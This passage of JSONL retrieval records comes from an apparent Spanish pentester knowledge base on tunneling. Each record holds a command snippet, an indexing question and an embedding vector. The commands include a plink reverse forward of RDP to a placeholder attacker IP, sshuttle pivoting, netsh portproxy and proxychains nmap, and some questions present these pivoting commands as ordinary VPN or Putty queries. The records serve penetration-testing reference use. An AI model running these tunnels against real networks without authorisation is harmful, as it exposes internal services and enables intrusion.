-0.02134, -0.02541, -0.07795, -0.03858, 0.10019, -0.15235, 0.03135, -0.05055, -0.00023, 0.03391, 0.00493, 0.01563, -0.01805, 0.14415, -0.01322, 0.02815, -0.02467, -0.09216, -0.01337, -0.0559, -0.09307, -0.03067, -0.05498, 0.01116, -0.05711, 0.01327, 0.02632, -0.02465, 0.05851, 0.07525, 0.00726, 0.07523, -0.02548, -0.00459, 0.02598, 0.03666, -0.04085, -0.05959, 0.16456, -0.02961, -0.00705, -0.00021, -0.05779, -0.00866, -0.03933, 0.05422, -0.02644, -0.00637, -0.05451, -0.07968, -0.01608, 0.01082, -0.07087, -0.06395, -0.01156, -0.06415, 0.04914, -0.00917, 0.06638, -0.03884, -0.01551, -0.01929, 0.11254, -0.04424, -0.06149, 0.02391, -0.07059, 0.07747, -0.04036, -0.01363, 0.08675, 0.02977, -0.12476, -0.0558, -0.15259, 0.03069, 0.01376, -0.01977, -0.03735, 0.03759, 0.01898, 0.02488, -0.05223, -0.08314, -0.01909, 0.134, -0.01286, -0.04649, 0.03354, -0.01586, 0.01704, 0.02207, 0.00088, -0.02398, 0.04745, -0.04878, -0.00843, 0.06025, 0.01382, 0.0432, -0.0491, -0.05032, -0.00361, 0.04721, 0.08575, -0.00935, 0.0435, 0.02564, -0.06736, 0.04529, -0.08331, -0.02706, 0.02988, 0.01354, -0.00159, -0.03664, 0.07361, -0.01523, 0.00416, -0.02178, -0.02919, -0.02111, -0.02067, -0.02682, 0.00431, -0.00666, 0.06875, -0.01908, -0.07614, 0.05001, -0.00691, -0.00968, -0.02591, -0.05487, -0.01768, -0.10152, 0.01709, -0.05106, -0.03418, 0.0829, 0.0679, -0.04156, 0.0496, -0.01316, 0.0448, 0.01713, -0.01584, 0.0386, 0.00044, -0.00029, -0.06539, 0.01001, 0.01336, 0.00982, -0.00554, 0.02223, -0.00296, 0.0696, -0.03346, -0.02097, -0.01936, -0.02477, 0.01206, 0.02819, 0.00436, 0.01326, -0.0215, 0.02145, -0.02675, 0.02071, -0.02488, 0.01688, -0.02279, -0.04572, 0.04083, 0.00378, 0.04989, 0.04533, -0.0943, -0.03354, -0.01858, -0.05624, -0.0296, -0.06683, -0.0573, -0.02815, 0.01023, 0.01725, -0.05984, -0.0278, 0.02804]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Plink (SSH desde Windows)\n```cmd\nplink.exe -R 3390:127.0.0.1:3389 user@TU_IP\n```", "indexar": "Necesito conectarme a una mΓ‘quina Linux usando el puerto 3389, ΒΏquΓ© alternativa hay a Putty?", "v": [-0.14864, 0.07407, -0.20012, -0.10615, -0.03909, -0.06472, -0.11177, -0.01089, -0.1833, -0.04637, -0.067, -0.00692, 0.02686, 0.06892, -0.07989, -0.15662, -0.09252, -0.0342, 0.0879, -0.12625, -0.12674, 0.03758, -0.12924, -0.06935, 0.06121, 0.15567, 0.1424, -0.03479, -0.09765, 0.05439, -0.04587, 0.03781, 0.05888, 0.06219, -0.06073, -0.0819, 0.08208, 0.04036, 0.24233, 0.14602, 0.11764, 0.03033, -0.07399, 0.11944, 0.05819, -0.14798, 0.09528, -0.14959, 0.01226, 0.00765, -0.0383, 0.04042, -0.07837, 0.04204, 0.01991, 0.01244, 0.16053, -0.04255, -0.00203, -0.00328, -0.1275, -0.02761, -0.0088, -0.01111, -0.02278, -0.0189, -0.08693, 0.06093, -0.11894, 0.02472, -0.0429, 0.0313, -0.02995, -0.01725, 0.06134, 0.04001, -0.00303, 0.05489, 0.02622, 0.03914, -0.00806, -0.04936, 0.05823, -0.03052, -0.05688, -0.07796, 0.05681, -0.00033, 0.03082, -0.03493, 0.10672, 0.0264, 0.01136, 0.03524, -0.00012, -0.00433, 0.02086, 0.08585, 0.04271, -0.02289, 0.04472, 0.05042, -0.09793, 0.11107, -0.05387, -0.01655, -0.02994, -0.04602, -0.00789, 0.04366, 0.07865, -0.03387, 0.04161, -0.07311, -0.03415, -0.0648, 0.04293, -0.06879, -0.0513, 0.01544, -0.05387, 0.00486, 0.00493, -0.06062, -0.02785, -0.00176, 0.01666, 0.13014, -0.00081, -0.04313, 0.09405, -0.12364, -0.03873, -0.10839, -0.08413, 0.01658, 0.09648, -0.15151, -0.00903, -0.046, -0.02319, 0.06157, -0.02996, -0.02801, 0.0394, 0.02886, 0.04295, -0.05144, -0.01469, 0.00438, -0.01946, -0.00663, -0.05572, 0.03979, -0.05468, 0.02218, 0.05576, -0.025, -0.09098, -0.00897, 0.00263, -0.04793, -0.01822, 0.01193, -0.0543, 0.02559, -0.04046, 0.05602, -0.02854, -0.01029, 0.04158, 0.03429, -0.03554, 0.03064, -0.003, -0.07937, 0.04027, -0.0409, 0.01316, 0.04623, -0.02143, 0.03353, -0.03542, -0.09779, 0.03219, 0.029, -0.01192, -0.00552, 0.04807, 0.04855, 0.03215, 0.00471, -0.06298, -0.08812, 0.05439, 0.00756, 0.01195, -0.10284, -0.00378, 0.03479, -0.042, 0.06985, 0.01829, -0.02656, 0.03109, 0.03414, -0.06871, -0.02465, -0.02665, 0.0243, 0.03474, 0.01032, 0.03989, 0.00536, 0.02944, 0.02161, -0.00667, 0.02759, 0.00619, -0.01353, -0.00862, 0.01866, -0.03694, 0.02837, 0.01783, -0.05609, 0.06258, 0.0069, -0.00066, -0.00949, -0.00332, 0.04099, 0.0251, 0.05813, -0.0388, -0.02469, 0.016, -0.0312, -0.02226, -0.05397, 0.00502, 0.06028, 0.04932, -0.02038, -0.00884, 0.0035, -0.07781, -0.03845, -0.04727, -0.03255, -0.04094, 0.05844, 0.00591, -0.00252, 0.02141, 0.03113]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## sshuttle (VPN improvisada, lo mΓ‘s cΓ³modo)\n```bash\nsshuttle -r user@pivot 192.168.5.0/24 --dns\n```", "indexar": "quΓ© programa sirve para crear una VPN rΓ‘pida sin configurar mucho?", "v": [-0.0402, 0.07695, -0.25099, -0.18204, 0.05815, -0.0872, 0.08081, -0.16074, 0.03903, -0.20696, 0.11689, -0.15508, -0.02423, -0.12451, -0.06467, 0.09479, -0.0108, -0.1395, 0.26589, 0.17309, -0.06674, -0.11129, -0.01628, -0.05934, -0.04438, 0.04384, 0.07296, -0.02986, -0.13078, -0.05931, 0.01727, 0.03097, 0.00479, 0.02251, -0.06365, 0.03493, 0.08382, 0.09856, -0.00598, 0.10353, 0.0296, -0.00292, 0.0411, 0.07685, 0.02545, -0.00136, 0.06496, -0.00783, 0.03635, -0.02258, -0.03139, 0.06709, -0.05428, 0.01705, 0.06277, -0.00506, -0.00076, -0.23823, -0.01409, -0.0458, -0.07181, -0.0321, 0.07041, -0.05551, 0.01258, 0.01884, -0.05398, 0.01275, -0.08814, -0.00551, -0.04119, -0.02377, 0.00777, 0.00867, 0.08741, 0.01003, -0.06059, -0.02646, 0.10355, 0.06158, 0.07503, 0.00072, -0.03699, -0.06835, -0.11918, 0.0156, -0.00767, 0.03634, 0.0129, -0.072, 0.00252, 0.02762, 0.04374, 0.00213, 0.10722, -0.01378, 0.09726, 0.02408, 0.02666, 0.04775, 0.05784, -0.00706, -0.19113, 0.11937, -0.05606, 0.05569, 0.00714, -0.00604, -0.01166, 0.0273, 0.07154, 0.05852, -0.05839, -0.02313, -0.0488, -0.06398, -0.03125, -0.01967, 0.03701, -0.01467, -0.0839, -0.01596, -0.01867, 0.01112, 0.02263, 0.04107, -0.00382, 0.13468, 0.00934, 0.11751, 0.03002, -0.08233, -0.03109, -0.03993, -0.06802, -0.03853, 0.02498, -0.02731, -0.03282, -0.09561, 0.05795, 0.00866, 0.00016, -0.00561, 0.01712, -0.03546, 0.05618, -0.11268, 0.02848, 0.04607, 0.00181, 0.00582, -0.01044, -0.0187, -0.09389, 0.00428, -0.01813, -0.07501, -0.05779, 0.08729, 0.01881, -0.00881, 0.0113, -0.04137, 0.04599, -0.03509, -0.04274, -0.00221, 0.10129, 0.12488, -0.02818, 0.02192, 0.04531, -0.08983, -0.02227, -0.00889, 0.03691, -0.05469, 0.04251, 0.02561, -0.05737, -0.02409, 0.05319, 0.02075, -0.01896, -0.01832, 0.00176, 0.01604, -0.01678, 0.00812, -0.01599, 0.01922, -0.04262, -0.01416, -0.02473, -0.06781, -0.01137, -0.0956, 0.00051, -0.04617, -0.02093, -0.02275, 0.00042, -0.02204, 0.02063, 0.04536, -0.04337, 0.00808, 0.01748, 0.06146, 0.01777, -0.03683, 0.02292, 0.00962, 0.00883, 0.00816, 0.00639, 0.00576, 0.06645, -0.02241, -0.00224, 0.02228, -0.04396, 0.01583, 0.00664, -0.02691, 0.02963, 0.02405, 0.00702, 0.02309, -0.05059, -0.01532, -0.01285, -0.04416, 0.04475, -0.02649, 0.00631, 0.00308, 0.00446, -0.01214, -0.02377, 0.04559, -0.00806, -0.03306, 0.00257, 0.00292, -0.04309, 0.0519, -0.02787, -0.04602, -0.03834, 0.03765, 0.06577, -0.01667, 0.01672, 0.02882]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## sshuttle (VPN improvisada, lo mΓ‘s cΓ³modo)\n```bash\nsshuttle -r user@pivot 192.168.5.0/24 --dns\n```", "indexar": "con quΓ© puedo montar una red privada desde mi ordenador de forma sencilla?", "v": [-0.05512, 0.11602, -0.07628, -0.10442, -0.13012, -0.02267, -0.06835, 0.05001, -0.15985, -0.15099, -0.02412, -0.04325, 0.07635, -0.1312, 0.14197, -0.03253, 0.06637, -0.0588, 0.10696, 0.00349, 0.02271, -0.12269, -0.04919, -0.04442, 0.09098, 0.10922, 0.11192, -0.03041, -0.09022, 0.00545, 0.03668, 0.09926, -0.01594, 0.00282, -0.0921, 0.01874, 0.10012, -0.00303, 0.02547, -0.04353, -0.00836, -0.00293, 0.04722, 0.1673, 0.13077, 0.01874, 0.01387, -0.0946, -0.01553, 0.0393, 0.01224, -0.15462, -0.07467, -0.08924, -0.04801, -0.1283, 0.08954, -0.0631, 0.10185, 0.00468, -0.04087, 0.14538, -0.03163, 0.14032, 0.05961, -0.00702, -0.02367, 0.02568, -0.08782, 0.01726, -0.02354, -0.06615, -0.09528, -0.00857, 0.00997, 0.05479, -0.01669, -0.09662, 0.14071, 0.06208, -0.00392, -0.00549, -0.03936, -0.02631, -0.00858, -0.05219, 0.01293, -0.06811, 0.01917, -0.01049, 0.06981, 0.00569, 0.02716, 0.01061, -0.00387, -0.00958, 0.05756, 0.16966, -0.11724, -0.05071, -0.01744, 0.06915, -0.07604, 0.15482, -0.01955, 0.01229, 0.02373, -0.02181, 0.05569, -0.06743, 0.08688, 0.02858, -0.0529, 0.0053, -0.07128, -0.08285, 0.00751, 0.02682, -0.09911, 0.01982, -0.02277, 0.00215, -0.00276, -0.00078, -0.00745, -0.04636, -0.00405, 0.11327, -0.07248, -0.03809, -0.03037, -0.01018, -0.00658, -0.0752, 0.00782, 0.04307, -0.10358, -0.1294, 0.01501, -0.08913, 0.06873, 0.04586, -0.11701, -0.13715, -0.03325, 0.08294, 0.05916, -0.08845, -0.02694, -0.00147, 0.06849, 0.06005, 0.00281, -0.00757, -0.04761, 0.09717, 0.0511, 0.05327, 0.00069, 0.08406, -0.0357, 0.0685, -0.02565, -0.02192, 0.00052, -0.04264, -0.03454, -0.04761, 0.04541, 0.01568, -0.09951, 0.05826, -0.05347, -0.10531, 0.0626, -0.02468, -0.06047, -0.03866, -0.02179, -0.02993, 0.02683, 0.1005, -0.024, 0.05742, -0.05687, -0.05237, 0.01322, 0.03314, 0.00311, -0.03351, -0.02214, -0.00174, 0.04618, 0.01068, 0.09453, 0.01005, -0.07555, 0.01848, 0.02254, -0.02668, -0.06067, -0.02706, -0.04693, 0.02912, 0.02786, 0.01344, -0.04973, 0.01169, 0.02171, 0.09238, -0.02008, 0.03413, 0.03201, -0.04966, -0.01697, 0.02991, 0.04038, -0.00953, -0.00435, 0.00839, 0.08005, -0.00995, 0.06818, 0.00329, 0.01867, -0.02477, -0.02901, 0.01725, -0.00803, 0.03141, 0.03953, -0.0019, 0.00343, 0.00615, -0.04016, -0.04971, 0.03408, 0.02575, -0.05622, 0.06528, 0.05191, 0.05703, 0.01938, -0.0625, -0.01904, -0.02913, -0.07783, 0.0103, -0.05102, -0.06202, -0.05323, -0.04706, -0.01955, -0.05537, -0.04232, 0.02776]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## sshuttle (VPN improvisada, lo mΓ‘s cΓ³modo)\n```bash\nsshuttle -r user@pivot 192.168.5.0/24 --dns\n```", "indexar": "hay alguna alternativa a OpenVPN que se pueda usar con un solo comando?", "v": [-0.13025, 0.12743, -0.20654, -0.05087, -0.11204, -0.13721, 0.10034, -0.12259, -0.21302, -0.15674, -0.07023, -0.15426, 0.03024, 0.02276, -0.0902, 0.0457, 0.09414, -0.08169, 0.14723, 0.01802, -0.13934, 0.02668, -0.02791, -0.03487, 0.05718, 0.07717, 0.03173, -0.0343, -0.17568, -0.1483, -0.03399, 0.08535, 0.04574, 0.00487, -0.11908, 0.07819, 0.02401, 0.07056, 0.16514, 0.09869, -0.04975, -0.00922, -0.1142, 0.1298, 0.00714, 0.02461, -0.06392, 0.0509, -0.08485, 0.00689, -0.04167, -0.04264, -0.058, -0.02462, 0.08993, 0.03127, 0.07578, -0.06097, -0.03241, -0.06661, -0.04993, -0.05055, 0.02817, 0.02928, -0.05612, 0.00285, -0.074, -0.08526, -0.13092, 0.03563, -0.05045, 0.08035, -0.01311, 0.07957, 0.00578, 0.0079, -0.06038, -0.03202, 0.14451, 0.06379, -0.00313, 0.00607, -0.01443, 0.00829, -0.14575, -0.1192, 0.04354, -0.0389, 0.00453, -0.00687, 0.0123, 0.01779, 0.01158, 0.06931, 0.03609, -0.045, -0.0181, 0.07447, 0.03303, -0.02023, 0.09202, -0.02106, -0.03651, 0.00847, 0.01481, -0.02981, 0.07444, -0.05261, -0.01611, 0.04747, 0.03575, 0.02213, 0.02146, -0.0078, -0.06629, -0.07193, -0.07736, -0.13128, -0.05419, -0.07636, -0.09957, -0.06998, 0.04028, 0.03722, 0.02493, -0.02802, -0.01914, 0.03538, 0.02717, 0.02151, -0.03712, -0.01848, 0.01284, -0.10095, -0.10869, 0.08297, 0.06454, 0.01474, 0.00638, -0.05366, -0.00932, 0.05428, 0.01277, -0.05972, 0.0351, -0.04301, 0.02933, -0.04433, -0.00198, -0.02433, 0.05017, 0.03778, -0.04822, 0.0888, -0.0281, 0.04907, -0.01471, -0.02988, -0.02223, 0.05988, -0.07945, -0.03307, -0.05703, 0.04238, 0.02859, -0.04239, -0.01251, -0.05839, -0.02457, 0.02414, 0.01932, 0.12094, 0.02627, 0.00663, 0.01106, -0.10616, 0.00142, -0.05778, 0.00536, 0.01679, 0.05652, 0.02388, -0.06195, -0.05103, 0.03294, 0.0249, 0.00432, -0.03154, -0.06326, -0.01328, -0.01321, 0.05711, -0.04282, -0.05915, -0.03082, -0.00617, 0.06307, 0.01185, -0.05005, -0.0086, -0.02572, 0.05385, -0.02091, -0.07687, 0.01746, -0.03598, -0.07948, 0.10453, -0.01228, 0.01519, 0.02031, -0.02906, 0.09055, 0.00793, -0.05467, 0.04242, -0.05236, 0.00591, -0.03222, -0.00039, 0.01268, 0.04791, -0.00452, 0.01331, 0.05948, 0.01031, -0.05081, -0.03057, 0.01358, 0.02398, 0.01003, -0.02293, -0.00394, 0.04391, 0.00307, -0.0154, -0.00943, 0.0303, 0.03663, 0.00701, -0.01861, 0.06726, -0.00544, -0.03287, -0.01111, -0.05082, -0.09504, 0.01546, -0.05994, -0.06615, -0.03171, 0.01359, -0.01393, -0.01722, -0.00808, 0.01874]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Windows nativo β€” netsh portproxy\n```cmd\nnetsh interface portproxy add v4tov4 listenport=8080 connectaddress=192.168.5.10 connectport=80\n```", "indexar": "quΓ© programa nativo de Windows sirve para redirigir puertos desde el 8080 al 80?", "v": [-0.0346, -0.07195, -0.01131, -0.03282, 0.12387, -0.04261, 0.04335, -0.13385, -0.07958, -0.11137, 0.03076, -0.08421, 0.03333, -0.16524, -0.02843, -0.04189, -0.05016, -0.0514, 0.07381, 0.0684, -0.04469, 0.04095, 0.02377, -0.06497, -2e-05, 0.04066, 0.03405, -0.02148, -0.0857, 0.00033, 0.05866, -0.02626, 0.05864, -0.17353, -0.02435, -0.04322, -0.04341, 0.03096, 0.0463, 0.08609, 0.09259, 0.05094, -0.04033, -0.03753, 0.16052, -0.03733, 0.06315, -0.08567, 0.12315, -0.09469, -0.02966, 0.01645, 0.03839, 0.0396, 0.03167, 0.02661, 0.08008, -0.07756, -0.02679, 0.02066, -0.00278, 0.08624, -0.05032, -0.04893, 0.09568, -0.09906, 0.01143, 0.04551, -0.09978, 0.04904, -0.14915, -0.02247, 0.07497, 0.0291, 0.02083, -0.0016, -0.0627, 0.03141, 0.08007, -0.04109, 0.14569, 0.05174, -0.02063, -0.11936, -0.02676, -0.04689, -0.09064, -0.03479, 0.01011, -0.14512, 0.00847, -0.04189, 0.00132, 0.16522, 3e-05, -0.10896, 0.01945, 0.06821, -0.01017, 0.09981, 0.01121, -0.03806, -0.06708, 0.0095, -0.00707, 0.0816, -0.01665, -0.10271, -0.0645, 0.04168, 0.03463, 0.0403, -0.0053, -0.02266, -0.04939, 0.02757, 0.01836, -0.0783, 0.10071, 0.01687, -0.12671, -0.02021, -0.02909, 0.01545, 0.01353, -0.09954, 0.0435, 0.16085, -0.08607, 0.03464, 0.09383, -0.00136, -0.04745, -0.0545, -0.04803, -0.00553, 0.03131, -0.0245, -0.05501, -0.01556, -0.00346, 0.17563, 0.0287, -0.00742, 0.05867, 0.00599, 0.07782, 0.06015, 0.03685, -0.03897, 0.0018, 0.05078, -0.03796, 0.0661, -0.07867, -0.00466, 0.06604, 0.01619, -0.03263, -0.06514, -0.01172, -0.02792, -0.07982, -0.09453, 0.06477, -0.0406, -0.0645, 0.03268, 0.1285, 0.04545, -0.0786, 0.10092, -0.04507, -0.15519, 0.01226, -0.03067, -0.03545, -0.06872, -0.04356, -0.03377, -0.10687, 0.03483, 0.03774, -0.06637, -0.02679, -0.03431, -0.11584, 0.04429, -0.00349, 0.01013, -0.07027, -0.01237, -0.00433, -0.03981, -0.05353, 0.03188, -0.07945, -0.0201, -0.01406, -0.00115, -0.05332, 0.07588, 0.02066, -0.03214, 0.03904, 0.13298, -0.09267, -0.01102, 0.05349, 0.13095, -0.02235, -0.08034, 0.00716, 0.03922, -0.05652, -0.01634, 0.03773, 0.04775, 0.04917, 0.08248, -0.03674, -0.00424, -0.03315, 0.12396, 0.01912, -0.09408, -0.04914, 0.02708, 0.05905, 0.01024, 0.0365, -0.01987, -0.0243, -0.02003, -0.00521, -0.02014, -0.01859, 0.01196, -0.02422, -0.09154, -0.02572, -0.005, 0.00035, -0.05779, 0.00215, -0.01574, -0.00251, -0.01128, -0.01954, -0.01651, 0.00263, -0.01701, 0.02078, 0.0057, -0.00957, 0.01252]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Windows nativo β€” netsh portproxy\n```cmd\nnetsh interface portproxy add v4tov4 listenport=8080 connectaddress=192.168.5.10 connectport=80\n```", "indexar": "con quΓ© comando puedo configurar una redirecciΓ³n de puerto local en Windows?", "v": [-0.08108, 0.07281, -0.08298, -0.17166, 0.04531, -0.07801, 0.11286, -0.02935, -0.10485, -0.15567, -0.07659, -0.04384, 0.01435, -0.13646, -0.04642, 0.00559, 0.02588, 0.06128, 0.05648, -0.0411, -0.04155, -0.08235, 0.02999, 0.04858, 0.16038, 0.06542, 0.10011, -0.04385, -0.10059, -0.05997, -0.0185, 0.04101, 0.00373, -0.00774, -0.04053, 0.05229, 0.0169, 0.0646, 0.00595, 0.14387, -0.04889, 0.04059, -0.09554, 0.10184, 0.09838, -0.0681, 0.07774, -0.13071, 0.1203, -0.01785, -0.01161, -0.04217, -0.04707, -0.04535, 0.01848, 0.04298, 0.11714, -0.05652, -0.02072, -0.01925, -0.01028, -0.02813, -0.01911, 0.09692, -0.00482, 0.03972, -0.02728, -0.00268, 0.01906, 0.07945, -0.09721, 0.01567, -0.01361, 0.06962, 0.10956, 0.02803, -0.04015, 0.01675, 0.18506, -0.00627, 0.01269, 0.14478, -0.06963, -0.02416, -0.02947, -0.15521, -0.08177, -0.12636, 0.04834, -0.13658, 0.08271, -0.17129, 0.0296, 0.0504, 0.04027, -0.00915, -0.00363, 0.05484, -0.02551, 0.08086, -0.00564, -0.01911, -0.13607, 0.14704, 0.06756, 0.08024, -0.01925, -0.06259, 0.07987, 0.00369, 0.08826, -0.0272, 0.00543, -0.00912, -0.0441, -0.11214, 0.00197, -0.08178, 0.00158, 0.02569, -0.11252, 0.00958, -0.03455, 0.03574, -2e-05, 0.00693, -0.00759, 0.09992, 0.01181, 0.05, 0.02362, -0.05331, 0.03713, -0.15494, -0.11414, 0.09583, 0.00562, -0.05961, -0.05538, -0.11561, -0.02794, 0.05681, -0.00649, 0.00126, 0.03759, 0.03477, 0.04437, -0.01315, -0.0365, 0.01487, 0.04195, 0.02849, -0.05294, 0.00387, -0.03305, 0.11157, 0.09774, 0.06232, 0.02288, -0.00884, -0.01, -0.01629, -0.07162, 0.02067, -0.00097, -0.06132, -0.07582, 0.04843, 0.05912, -0.0392, -0.0751, 0.08274, -0.08654, -0.02997, 0.0215, -0.03783, 0.02673, -0.05256, -0.02235, 0.01101, -0.0114, 0.08388, 0.00326, -0.03466, -0.01893, -0.02669, -0.06944, -0.01419, -0.03282, 0.02766, -0.05429, -0.01998, 0.00751, -0.03933, 0.01524, 0.029, -0.00847, -0.00042, -0.04413, 0.00446, -0.04272, 0.04872, 0.01959, -0.04253, 0.08078, 0.03074, -0.07923, 0.10165, 0.02846, 0.04535, -0.02197, 0.0235, 0.03992, -0.01997, -0.06237, -0.03204, 0.04155, -0.01005, 0.01543, 0.01142, 0.04652, 0.03239, 0.04506, 0.03257, -0.00631, -0.014, -0.05118, -0.03232, 0.06181, 0.07526, -0.0064, 0.00869, -0.0329, 0.00409, -0.01142, 0.0196, 0.02296, 0.06353, -0.01965, -0.00362, -0.01752, 0.06834, -0.04479, -0.08221, -0.05081, -0.08335, -0.09609, 0.01869, 0.01522, -0.03548, -0.04602, 0.0521, 0.03514, -0.03535, -0.05619, 0.04388]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Windows nativo β€” netsh portproxy\n```cmd\nnetsh interface portproxy add v4tov4 listenport=8080 connectaddress=192.168.5.10 connectport=80\n```", "indexar": "ΒΏcΓ³mo hago para enviar trΓ‘fico del puerto 8080 a otro IP y puerto usando herramientas del sistema?", "v": [-0.09745, -0.04551, -0.09413, -0.15426, 0.03872, -0.15767, 0.13257, -0.13245, -0.11463, -0.06302, -0.06702, 0.04094, 0.08262, -0.00517, -0.03729, -0.08101, 0.01163, 0.0072, 0.10417, -0.10916, -0.09318, 0.12647, -0.11311, -0.09539, 0.01334, 0.01604, -0.07921, 0.00294, -0.19036, -0.03319, -0.03312, -0.061, 0.11729, -0.02707, -0.10287, -0.16087, 0.10784, 0.04855, 0.08306, 0.09414, 0.07642, 0.00647, -0.05014, -0.0562, 0.11754, -0.03275, -0.01612, -0.09856, -0.0327, -0.06959, -0.0687, -0.11269, -0.06844, -0.05225, -0.08203, -0.00443, 0.11827, -0.0436, 0.02858, -0.08574, 0.06602, 0.08346, -0.09725, -0.0496, -0.00642, -0.12038, -0.05708, 0.06756, -0.13469, 0.00983, 0.01475, -0.007, 0.04705, 0.14667, 0.08624, -0.05252, 0.01241, 0.08847, 0.04696, 0.00542, 0.06419, 0.12182, -0.1015, -0.0327, -0.02509, -0.05888, -0.01744, -0.07785, 0.09863, -0.09283, 0.03658, -0.03416, 0.0195, 0.0598, 0.03133, 0.00891, -0.09582, 0.03983, 0.00027, 0.03024, 0.09857, 0.09046, -0.10448, -0.01745, 0.0172, 0.02825, -0.01821, -0.09181, 0.09315, 0.02849, -0.00898, 0.05339, 0.05595, -0.0675, -0.00488, -0.05118, -0.01088, -0.10928, -0.03282, -0.02326, -0.01517, 0.03691, -0.03376, -0.00826, 0.02766, -0.03301, 0.05373, 0.12908, 0.08242, -0.00759, 0.08613, -0.07908, -0.11543, -0.06371, 0.01057, -0.00802, -0.02291, -0.02771, -0.05738, 0.00807, -0.03171, 0.058, -0.02245, -0.05799, 0.09008, 0.02677, -0.02032, -0.0773, -0.03035, -0.09171, 0.01518, -0.01441, -0.02463, -0.00714, -0.0563, 0.03229, 0.0893, -0.07804, -0.05182, -0.03851, 0.00581, 0.0517, -0.01731, -0.01346, 0.01846, 0.01557, -0.0519, 0.06357, 0.10274, -0.02272, 0.00803, 0.04645, -0.02972, -0.03771, 0.0131, -0.02941, -0.08852, -0.0335, -0.06737, -0.01493, -0.0316, 0.03705, -0.02333, -0.02204, 0.01099, -0.06544, -0.00652, -0.00655, 0.02677, 0.11822, 0.03213, 0.03509, -0.02346, -0.0246, -0.00409, 0.04452, -0.04603, -0.09171, -0.02046, -0.01513, 0.00977, 0.04715, 0.07413, -0.04577, 0.00445, 0.05717, -0.06801, -0.01493, 0.04943, 0.08095, 0.00157, -0.01266, 0.06699, -0.0583, -0.05123, 0.04292, -0.01409, 0.02706, 0.02135, 0.02806, -0.03348, 0.06002, -0.04772, 0.07043, -0.01113, 0.01952, -0.00777, 0.04498, 0.05702, 0.01301, 0.00535, 0.01376, -0.05742, -0.02813, 0.00019, 0.00753, -0.04692, -0.02709, -0.05088, -0.07426, 0.0666, -0.01687, 0.01058, -0.03632, 0.00182, -0.0308, -0.05608, 0.03014, -0.03808, -0.04234, -0.0414, 0.02556, 0.02905, -0.03068, -0.01336, -0.00493]} +{"tipo": "pregunta", "herramienta": "Tunneling", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## proxychains\n- `proxychains nmap -sT -Pn IP` β†’ usa `-sT` (TCP connect): el SYN scan **no** pasa por el proxy. Ver Nmap NSE.\n\nRelacionado: Pivoting ligolo-ng Β· Movimiento lateral Β· Puesto de mando Kali Β· OSCP MOC", "indexar": "que programa puedo usar para hacer un escaneo TCP a travΓ©s de varios proxies?", "v": [-0.16131, -0.01822, -0.31693, 0.018, 0.10983, -0.1357, 0.15941, -0.03294, -0.05396, -0.03615, -0.05105, 0.15065, 0.03012, -0.10369, -0.0525, -0.03003, 0.0076, -0.03934, 0.1293, 0.14181, -0.01238, -0.03888, -0.10845, -0.04974, 0.03695, 0.07913, -0.02369, -0.01145, -0.05564, -0.01689, -0.05031, 0.07608, 0.10137, -0.05422, 0.00251, -0.06506, 0.03232, -0.02104, 0.08743, 0.05727, 0.03928, -0.03404, -0.10658, -0.05699, 0.07883, 0.00773, -0.0179, -0.03242, -0.079, -0.04241, -0.08545, -0.08159, -0.15054, -0.01085, 0.01636, -0.12759, 0.02376, -0.06171, -0.07476, -0.03365, 0.00231, 0.06463, 0.00351, -0.0667, -0.08271, -0.05642, 0.02343, -0.00205, -0.15787, 0.02322, -0.0359, 0.06012, 0.04224, -0.05496, -0.01774, -0.01692, -0.06146, -0.07828, 0.10047, -0.09548, -0.0624, -0.0154, -0.02555, 0.01432, -0.20231, -0.05789, 0.08349, -0.00234, -0.00198, -0.03811, 0.00379, 0.06003, 0.03551, 0.03246, 0.15705, -0.08879, 0.07794, 0.01567, 0.02227, 0.04882, 0.11867, -0.05249, -0.11647, 0.12591, -0.08529, -0.01581, 0.05356, -0.02848, -0.04611, 0.09425, -0.0174, 0.04932, -0.13204, -0.07636, -0.09769, 0.0081, -0.03464, -0.04137, 0.08159, -0.0298, -0.07219, 0.01084, -0.01161, 0.0305, 0.12339, 0.01063, -0.05609, 0.07661, -0.02681, 0.07743, -0.00809, 0.04461, -0.06706, -0.08308, -0.09183, -0.07954, 0.04578, -0.07202, 0.0301, -0.03357, 0.04202, 0.04249, -0.00401, -0.01313, 0.02106, -0.0042, -0.02721, -0.0507, -0.03614, 0.03675, 0.04574, -0.01468, -0.05055, 0.02426, -0.03263, -0.03953, 0.05465, -0.03422, 0.01506, 0.06949, -0.05494, -0.01835, -0.01986, -0.0042, 0.05829, -0.10488, -0.01887, 0.01566, -0.03908, 0.02943, -0.00895, 0.11044, 0.03754, -0.08506, 0.0189, -0.02722, -0.00807, -0.10819, 0.0071, -0.04255, -0.08284, 0.05448, 0.00334, -0.02941, 0.01727, 0.0072, -0.01949, 0.05781, -0.03004, 0.04026, -0.01999, 0.05879, 0.01798, 0.002, -0.03138, -0.02539, 0.0287, -0.01326, 0.05999, -0.04642, -0.06225, 0.00425, -0.00484, -0.069, 0.04455, 0.03413, -0.03209, 0.01, 0.04286, 0.07193, 0.04055, -0.04588, 0.05415, 0.0049, -0.01367, 0.01349, -0.02803, 0.06147, 0.00743, 0.02814, -0.0189, -0.03685, 